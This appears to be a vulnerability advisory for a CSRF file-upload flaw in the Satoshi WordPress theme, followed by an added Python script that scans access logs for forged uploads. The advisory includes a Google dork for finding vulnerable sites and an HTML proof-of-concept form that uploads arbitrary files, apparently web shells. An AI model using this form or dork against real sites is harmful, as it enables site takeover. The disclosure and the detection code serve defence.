Satoshi Theme - File Upload CSRF



#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type: CSRF
OWASP Top 10: A8: Cross-Site Request Forgery (CSRF)
CWE: CWE-352

Miscellaneous

Submitter: Anonymous
Views: 750
Verified: No
WPVDB ID: 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here

3xploi7 Team
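
Added example, not part of the original advisory: a log check a site owner can run to find POSTs to the upload endpoint named in the PoC form whose Referer is missing or off-site, which is how a forged cross-site submission appears in an access log. It assumes the Apache/nginx combined log format; the function name, the host blog.example.com and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Path taken from the PoC form's action attribute (compared case-insensitively).
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"

# Apache/nginx "combined" log format (assumed).
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def suspicious_uploads(lines, site_hosts):
    """Return (ip, timestamp, status, reason) for POSTs to the theme's upload
    endpoint whose Referer is missing or points at a different host."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m or m["method"] != "POST":
            continue
        if urlsplit(m["uri"]).path.lower() != UPLOAD_PATH:
            continue
        ref = m["referer"]
        host = (urlsplit(ref).hostname or "") if ref not in ("", "-") else ""
        if not host:
            reason = "no referer"
        elif host.lower() in site_hosts:
            continue  # submitted from one of the site's own pages
        else:
            reason = "cross-site referer: " + host
        hits.append((m["ip"], m["ts"], int(m["status"]), reason))
    return hits

# Constructed sample log lines (documentation addresses and example domains).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Dec/2014:10:01:02 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://other.example.net/page.html" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Dec/2014:10:01:09 +0000] "GET /wp-content/themes/satoshi/style.css HTTP/1.1" 200 812 "http://blog.example.com/" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Dec/2014:10:05:40 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "-" "curl/7.38.0"',
    '192.0.2.10 - - [06/Dec/2014:10:09:11 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://blog.example.com/wp-admin/themes.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_uploads(SAMPLE_LOG, {"blog.example.com"}):
        print(hit)
```

The Referer header is client-controlled, so treat a hit as a lead to correlate with new files under the uploads directory, not as proof on its own.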
